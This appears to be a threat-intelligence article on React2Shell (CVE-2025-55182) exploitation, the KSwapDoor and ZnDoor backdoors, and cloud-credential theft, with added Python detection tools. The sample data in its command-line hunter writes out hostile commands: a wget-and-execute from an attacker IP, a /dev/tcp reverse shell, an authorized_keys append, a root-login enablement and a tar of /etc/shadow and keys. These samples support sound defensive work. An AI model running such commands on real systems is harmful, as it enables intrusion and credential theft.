React2Shell Vulnerability
Security researchers have confirmed that the critical vulnerability known as React2Shell is being actively abused by multiple threat actors to compromise Linux-based systems. The flaw is being leveraged to deploy several malware families, most notably KSwapDoor and ZnDoor, enabling deep and persistent access to affected environments. The ongoing exploitation highlights how quickly high‑impact application flaws are operationalized once disclosed.
KSwapDoor: A Stealth-Focused Linux Backdoor
KSwapDoor is a carefully engineered remote access tool built to remain hidden for long periods. It establishes an internal mesh network in which infected servers relay traffic for one another, which helps the attackers get past perimeter defenses and keeps the implant reachable even when individual nodes are blocked. Its network traffic is protected with strong encryption, which makes inspection and detection significantly harder. Its most concerning capability is a dormant or 'sleeper' state: the malware stays inactive until a covert trigger reactivates it, so firewall rules keyed to persistent listeners or steady beaconing have nothing to catch while it sleeps.
Researchers clarified that KSwapDoor had previously been misidentified as BPFDoor. In reality, it is a Linux backdoor that supports interactive shell access, arbitrary command execution, file manipulation, and scanning for lateral movement opportunities. To further blend in, it masquerades as a legitimate Linux kernel swap daemon, reducing the likelihood of raising suspicion during routine system monitoring.
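A practical check for the masquerading described above, added here as an example and not taken from the researchers' report: the real swap daemon runs as kernel threads (kswapd0, kswapd1, one per NUMA node), and a userland impostor that merely renames itself cannot reproduce every property of a kernel thread. The three properties tested are standard Linux behaviour; the sample process table, including the /tmp path, is constructed.

```python
"""Hunt for a userland process posing as the kernel swap daemon.

Genuine kswapdN threads are kernel threads: children of kthreadd (PID 2),
with an empty /proc/<pid>/cmdline and no executable behind /proc/<pid>/exe.
A backdoor that only renames itself cannot satisfy all three checks.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

KTHREADD_PID = 2
KSWAPD_NAME = re.compile(r"^kswapd\d+$")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str            # /proc/<pid>/comm, the ps COMMAND column
    cmdline: str         # /proc/<pid>/cmdline with NUL separators turned into spaces
    exe: Optional[str]   # readlink(/proc/<pid>/exe); None when the link cannot be read


def is_kernel_thread(p: Proc) -> bool:
    """True only for the process shape a real kernel thread has."""
    return p.ppid == KTHREADD_PID and p.exe is None and p.cmdline == ""


def suspicious_kswapd(procs: List[Proc]) -> List[Proc]:
    """Processes named like kswapd (with or without ps-style brackets) that are not kernel threads."""
    return [p for p in procs
            if KSWAPD_NAME.match(p.comm.strip().strip("[]")) and not is_kernel_thread(p)]


def read_proc(pid: int) -> Optional[Proc]:
    """Build a Proc from /proc/<pid>; None if it vanished or cannot be read."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/stat") as f:
            stat = f.read()
        # stat is "pid (comm) state ppid ..."; comm may contain spaces or
        # parentheses, so split on the last closing parenthesis.
        close = stat.rindex(")")
        comm = stat[stat.index("(") + 1:close]
        ppid = int(stat[close + 1:].split()[1])
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
    except OSError:
        return None
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:          # ENOENT for kernel threads, EACCES for other users' processes
        exe = None
    return Proc(pid, ppid, comm, cmdline, exe)


def self_proc() -> Optional[Proc]:
    """The current interpreter as seen through /proc (None on hosts without /proc)."""
    return read_proc(os.getpid())


def snapshot_procs() -> List[Proc]:
    """Collect every live process from /proc (run as root so exe links resolve)."""
    procs = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            p = read_proc(int(entry))
            if p is not None:
                procs.append(p)
    return procs


# Constructed sample: two genuine kswapd kernel threads, one impostor launched
# from /tmp by a shell, and an ordinary daemon. Not observations from the article.
SAMPLE = [
    Proc(pid=85, ppid=2, comm="kswapd0", cmdline="", exe=None),
    Proc(pid=86, ppid=2, comm="kswapd1", cmdline="", exe=None),
    Proc(pid=4120, ppid=3987, comm="kswapd0", cmdline="kswapd0", exe="/tmp/.cache/kswapd0"),
    Proc(pid=1201, ppid=1, comm="sshd", cmdline="/usr/sbin/sshd -D", exe="/usr/sbin/sshd"),
]

if __name__ == "__main__":
    procs = snapshot_procs() if os.path.isdir("/proc") else SAMPLE
    for p in suspicious_kswapd(procs):
        print(f"SUSPICIOUS pid={p.pid} ppid={p.ppid} comm={p.comm!r} exe={p.exe!r} cmdline={p.cmdline!r}")
```

Run it as root: as an unprivileged user the exe link of other users' processes is unreadable and reports as None, so only the parent-PID and cmdline checks remain, which still catch an impostor because nothing in userland can become a child of kthreadd.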
ZnDoor Campaigns Targeting Japanese Organizations
In parallel, organizations in Japan have been targeted with attacks that exploit React2Shell to deliver ZnDoor. This remote access trojan has been observed in real-world activity since at least December 2023. These intrusions typically begin with a simple bash command that retrieves the payload from a remote server at 45.76.155.14 using wget and then executes it locally.
Once installed, ZnDoor connects back to attacker‑controlled infrastructure to receive instructions and act on them. Its functionality is broad and enables full control over the compromised host, as illustrated by the supported command set below:
- shell and interactive_shell for direct command execution and interactive access
- explorer, explorer_cat, explorer_delete, explorer_upload, and explorer_download for file and directory operations
- system for collecting host information
- change_timefile to alter file timestamps
- socket_quick_startstreams to launch a SOCKS5 proxy
- start_in_port_forward and stop_in_port to manage port forwarding
CVE-2025-55182 and Multi-Group Weaponization
The broader activity is part of widespread exploitation of CVE-2025-55182, the identifier assigned to React2Shell, which carries the maximum CVSS score of 10.0. At least five China‑aligned threat groups have been observed weaponizing the flaw to distribute a diverse range of payloads, including tunneling tools, downloaders, and multiple Linux backdoors. Among these were MINOCAT, SNOWLIGHT, COMPOOD, an updated HISONIC variant that blends into legitimate traffic by communicating through Cloudflare Pages and GitLab, and a Linux version of ANGRYREBEL, also known as Noodle RAT.
Post‑Exploitation Abuse and Payload Diversity
After gaining initial code execution, attackers commonly run arbitrary commands to deepen their foothold. This includes establishing reverse shells to known Cobalt Strike infrastructure, deploying remote monitoring and management tools such as MeshAgent, altering the authorized_keys file, and enabling direct root logins. Additional payloads seen during these operations include VShell, EtherRAT, ShadowPad, XMRig, and repeated deployments of SNOWLIGHT.
To evade detection, the campaigns frequently rely on Cloudflare Tunnel endpoints under the trycloudflare.com domain, allowing command-and-control traffic to blend in with legitimate services. Extensive reconnaissance is then carried out to map the environment, support lateral movement, and identify valuable credentials.
Cloud Credential Harvesting and Secret Discovery
A major focus of these attacks is credential theft within cloud environments. Threat actors have been observed querying instance metadata services for Azure, AWS, Google Cloud Platform, and Tencent Cloud in an effort to obtain identity tokens and expand their access. They also deploy secret‑scanning tools such as TruffleHog and Gitleaks, alongside custom scripts, to extract sensitive material. This includes attempts to steal AI and cloud‑native credentials like OpenAI API keys, Databricks tokens, Kubernetes service account secrets, and access tokens obtained through Azure CLI and Azure Developer CLI tooling.
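The metadata-service queries described above can be caught in egress telemetry because each provider's token endpoint has a fixed host, path and, for Azure and GCP, a mandatory request header. The classifier below is an added example, not code from the researchers: the endpoint paths are the providers' documented ones, the JSON-lines log format and the process names used to rate severity are assumptions, and the log records are constructed.

```python
"""Classify HTTP requests that reach a cloud instance metadata service (IMDS).

A web-application process that starts fetching IMDS tokens right after an
exploitation attempt is a strong signal of credential harvesting. Input is a
constructed JSON-lines egress log, one request per line; adapt the loader to
whatever proxy, eBPF or EDR telemetry records outbound HTTP on your hosts.
"""
import json
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

IMDS_HOSTS = {
    "169.254.169.254",              # link-local address used by AWS, Azure and GCP
    "fd00:ec2::254",                # AWS IMDS over IPv6
    "metadata.google.internal",     # GCP
    "metadata.tencentyun.com",      # Tencent Cloud
}


def classify(method: str, url: str, headers: Dict[str, str]) -> Optional[str]:
    """Label credential-bearing IMDS requests, 'imds_other' for any other
    request to an IMDS host, or None for traffic that never touches IMDS."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if host not in IMDS_HOSTS:
        return None
    path = u.path
    hdr = {k.lower(): v for k, v in headers.items()}
    # AWS: IMDSv2 session token (PUT), then the role credentials (GET)
    if method.upper() == "PUT" and path == "/latest/api/token":
        return "aws_imdsv2_token"
    if path.startswith("/latest/meta-data/iam/security-credentials"):
        return "aws_iam_credentials"
    # Azure: managed-identity token endpoint, only served with "Metadata: true"
    if path.startswith("/metadata/identity/oauth2/token") and hdr.get("metadata", "").lower() == "true":
        return "azure_managed_identity_token"
    # GCP: service-account token endpoint, only served with "Metadata-Flavor: Google"
    if (path.startswith("/computeMetadata/v1/instance/service-accounts/")
            and path.endswith("/token") and hdr.get("metadata-flavor") == "Google"):
        return "gcp_service_account_token"
    # Tencent Cloud: CAM role credentials
    if host == "metadata.tencentyun.com" and path.startswith("/latest/meta-data/cam/security-credentials"):
        return "tencent_cam_credentials"
    return "imds_other"


def scan(log_lines: List[str], web_procs=("node", "next-server")) -> List[Tuple[str, str, str]]:
    """Return (severity, process, label) for every IMDS request in the log.
    Token fetches from the web-server process itself are rated high."""
    findings = []
    for line in log_lines:
        rec = json.loads(line)
        label = classify(rec["method"], rec["url"], rec.get("headers", {}))
        if label is None:
            continue
        comm = rec.get("comm", "?")
        severity = "high" if comm in web_procs and label != "imds_other" else "medium"
        findings.append((severity, comm, label))
    return findings


# Constructed egress log (assumed format: one JSON object per request).
SAMPLE_LOG = [
    '{"comm":"node","method":"GET","url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/web-role","headers":{}}',
    '{"comm":"node","method":"PUT","url":"http://169.254.169.254/latest/api/token","headers":{"X-aws-ec2-metadata-token-ttl-seconds":"21600"}}',
    '{"comm":"node","method":"GET","url":"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/","headers":{"Metadata":"true"}}',
    '{"comm":"node","method":"GET","url":"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token","headers":{"Metadata-Flavor":"Google"}}',
    '{"comm":"node","method":"GET","url":"http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/CVM-Role","headers":{}}',
    '{"comm":"cloud-init","method":"GET","url":"http://169.254.169.254/latest/meta-data/hostname","headers":{}}',
    '{"comm":"node","method":"GET","url":"https://registry.npmjs.org/react","headers":{}}',
]

if __name__ == "__main__":
    for severity, comm, label in scan(SAMPLE_LOG):
        print(f"{severity:6} {comm:12} {label}")
```

The header requirements on Azure and GCP stop a blind SSRF, but an attacker with code execution on the host sets any header it likes, so a successful token fetch from the application's own process is the signal to alert on. On AWS, requiring IMDSv2 with a hop limit of 1 removes the unauthenticated GET path but does not stop a local process that can issue the PUT first; the detection above covers both.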
Next.js Exploitation and Data Exfiltration
In a related campaign, researchers documented exploitation of multiple Next.js flaws, including CVE-2025-29927 and CVE-2025-66478, the latter a duplicate identifier for the same React2Shell issue tracked as CVE-2025-55182. These attacks focused on systematically extracting configuration files, environment variables, SSH keys, cloud credentials, Git authentication data, shell command history, and sensitive system files such as /etc/passwd and /etc/shadow. The malware also establishes persistence, installs a SOCKS5 proxy, opens a reverse shell to 67.217.57.240 on port 888, and deploys a React scanner to search the internet for additional vulnerable targets.
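The ZnDoor initial-access one-liner (wget from a bare IP, then execute), the post-exploitation commands in the previous section (reverse shells, authorized_keys edits, root login enablement, trycloudflare.com tunnels, MeshAgent) and the file-collection step described here all leave traces in executed command lines. The hunt below is an added example, not tooling from the researchers or any of the campaigns: its rules are the author's, the sample command lines are constructed (203.0.113.10, example.invalid and the tunnel subdomain are placeholders; 45.76.155.14 is the address named in the article), and the input is assumed to be one flattened command line per record, as produced from auditd EXECVE records, shell history or EDR process telemetry.

```python
"""Hunt for React2Shell post-exploitation commands in executed command lines.

Each rule is deliberately narrow: the goal is a short list of high-confidence
hits to triage, not coverage of every possible evasion.
"""
import re
from typing import List, Tuple

RULES = [
    # download tool chained to execution: piped into a shell, or chmod +x / run after && or ;
    ("remote_fetch_exec",
     re.compile(r"\b(?:wget|curl)\b.*(?:\|\s*(?:ba|da|z)?sh\b|(?:&&|;)\s*(?:chmod\s+\+x|\.?/\S+))")),
    # bash /dev/tcp, netcat -e or socat exec reverse shells
    ("reverse_shell",
     re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bsocat\b.*\bexec:", re.IGNORECASE)),
    # anything that writes into an authorized_keys file
    ("authorized_keys_write",
     re.compile(r"(?:>>?|\btee\b|\bsed\s+-i\b).*authorized_keys")),
    # enabling direct root SSH login in sshd_config
    ("permit_root_login",
     re.compile(r"PermitRootLogin\s+yes|\bsed\b.*PermitRootLogin")),
    # Cloudflare Tunnel client or a trycloudflare.com endpoint
    ("cloudflare_tunnel",
     re.compile(r"trycloudflare\.com|\bcloudflared\b")),
    # remote monitoring and management agent abused as a backdoor
    ("rmm_tool",
     re.compile(r"meshagent|meshcentral", re.IGNORECASE)),
    # bulk read or packaging of the files the exfiltration step targets
    ("sensitive_file_collect",
     re.compile(r"\b(?:cat|tar|cp|zip|base64|xxd|scp)\b.*(?:/etc/shadow|\.git-credentials|id_rsa|id_ed25519|\.bash_history|\.env\b|\.aws/credentials)")),
]


def hunt(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every rule that fires, in input order."""
    hits = []
    for cmd in cmdlines:
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((name, cmd))
    return hits


# Constructed sample command lines; only the first IP comes from the article.
SAMPLE_CMDLINES = [
    "wget -q http://45.76.155.14/x -O /tmp/x && chmod +x /tmp/x && /tmp/x",
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "echo 'ssh-ed25519 AAAAexamplekey attacker' >> /root/.ssh/authorized_keys",
    "sed -i 's/^#\\?PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config",
    "cloudflared tunnel --url http://localhost:22",
    "curl -fsSL https://get.example.invalid/install.sh | bash",
    "curl -s https://quiet-river-1234.trycloudflare.com/beacon -o /dev/null",
    "nohup ./meshagent -install >/dev/null 2>&1 &",
    "tar czf /tmp/.c.tgz /root/.ssh /root/.bash_history /var/www/app/.env /etc/shadow",
    "apt-get install -y htop",                                          # benign
    "wget https://mirror.example.invalid/setup.sh -O /tmp/setup.sh",    # download without execution
    "sed -i 's/foo/bar/' /etc/hosts",                                   # unrelated edit
]

if __name__ == "__main__":
    for rule, cmd in hunt(SAMPLE_CMDLINES):
        print(f"{rule:24} {cmd}")
```

On a server that should never run cloudflared, an RMM agent or a piped installer, every hit is worth a look; on a host where administrators legitimately do some of these things, filter by the executing user and parent process (a web-server worker or its shell child spawning any of them is the React2Shell signal).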
Operation PCPcat: Scale and Impact
The combined activity, tracked under the name Operation PCPcat, is believed to have already compromised 59,128 servers. Analysts assess the campaign as indicative of large‑scale intelligence collection and industrialized data exfiltration. Current measurements suggest more than 111,000 IP addresses remain vulnerable to React2Shell exploitation, with the highest concentration in the United States, followed by Germany, France, and India. Gathered telemetry further indicates that hundreds of malicious IP addresses across regions such as the U.S., India, the U.K., Singapore, and the Netherlands have actively participated in exploitation attempts within a single 24‑hour period.